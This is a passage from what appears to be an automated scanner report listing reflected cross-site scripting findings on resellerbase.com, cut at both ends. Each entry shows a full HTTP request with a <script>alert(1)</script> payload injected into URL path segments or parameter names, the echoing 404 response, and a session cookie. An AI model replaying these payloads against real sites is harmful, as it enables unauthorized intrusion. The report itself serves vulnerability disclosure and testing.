Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmosf34dd<script>alert(1)</script>bb008c87cde/images/review/ was not found on this server.</p>
...[SNIP]...

2.5188. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload df5a7<script>alert(1)</script>5fe15bed67f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/imagesdf5a7<script>alert(1)</script>5fe15bed67f/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/imagesdf5a7<script>alert(1)</script>5fe15bed67f/review/ was not found on this server.</p>
...[SNIP]...

2.5189. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 26d89<script>alert(1)</script>e0bd84e1494 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review26d89<script>alert(1)</script>e0bd84e1494/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review26d89<script>alert(1)</script>e0bd84e1494/ was not found on this server.</p>
...[SNIP]...

2.5190. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6ef63<script>alert(1)</script>ab182286de2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review/?6ef63<script>alert(1)</script>ab182286de2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/?6ef63<script>alert(1)</script>ab182286de2=1 was not found on this server.</p>
...[SNIP]...

2.5191. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11bfc<script>alert(1)</script>d01ba124da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service11bfc<script>alert(1)</script>d01ba124da/other/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service11bfc<script>alert(1)</script>d01ba124da/other/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5192. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f757a<script>alert(1)</script>d08fcf80278 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherf757a<script>alert(1)</script>d08fcf80278/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherf757a<script>alert(1)</script>d08fcf80278/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5193. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb9f0<script>alert(1)</script>c603361b153 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesbb9f0<script>alert(1)</script>c603361b153/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesbb9f0<script>alert(1)</script>c603361b153/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5194. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2256e<script>alert(1)</script>6ef11a889f2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos2256e<script>alert(1)</script>6ef11a889f2/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos2256e<script>alert(1)</script>6ef11a889f2/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5195. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 32fe3<script>alert(1)</script>629ea761107 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images32fe3<script>alert(1)</script>629ea761107/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images32fe3<script>alert(1)</script>629ea761107/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5196. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 10ada<script>alert(1)</script>70b8265c9fa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review10ada<script>alert(1)</script>70b8265c9fa/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review10ada<script>alert(1)</script>70b8265c9fa/0.gif was not found on this server.</p>
...[SNIP]...

2.5197. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 99636<script>alert(1)</script>7bd46c0be64 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review/0.gif99636<script>alert(1)</script>7bd46c0be64 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/0.gif99636<script>alert(1)</script>7bd46c0be64 was not found on this server.</p>
...[SNIP]...

2.5198. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4e0cb<script>alert(1)</script>3c8eb3cb59c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review/0.gif?4e0cb<script>alert(1)</script>3c8eb3cb59c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/0.gif?4e0cb<script>alert(1)</script>3c8eb3cb59c=1 was not found on this server.</p>
...[SNIP]...

2.5199. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5bc01<script>alert(1)</script>141cd4e779 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service5bc01<script>alert(1)</script>141cd4e779/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service5bc01<script>alert(1)</script>141cd4e779/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5200. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c813a<script>alert(1)</script>5cdf7127579 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherc813a<script>alert(1)</script>5cdf7127579/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherc813a<script>alert(1)</script>5cdf7127579/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5201. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b9b4a<script>alert(1)</script>65a0dd89dd4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesb9b4a<script>alert(1)</script>65a0dd89dd4/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesb9b4a<script>alert(1)</script>65a0dd89dd4/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5202. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bf979<script>alert(1)</script>b57adc0ed6c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmosbf979<script>alert(1)</script>b57adc0ed6c/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmosbf979<script>alert(1)</script>b57adc0ed6c/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5203. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b0fcb<script>alert(1)</script>2582b0d12dd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/imagesb0fcb<script>alert(1)</script>2582b0d12dd/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/imagesb0fcb<script>alert(1)</script>2582b0d12dd/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5204. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e480d<script>alert(1)</script>a341029c99b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/reviewe480d<script>alert(1)</script>a341029c99b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/reviewe480d<script>alert(1)</script>a341029c99b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5205. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 689a4<script>alert(1)</script>b71a1159802 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review/search.php689a4<script>alert(1)</script>b71a1159802?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/search.php689a4<script>alert(1)</script>b71a1159802?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5206. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/search.php

Issue detail

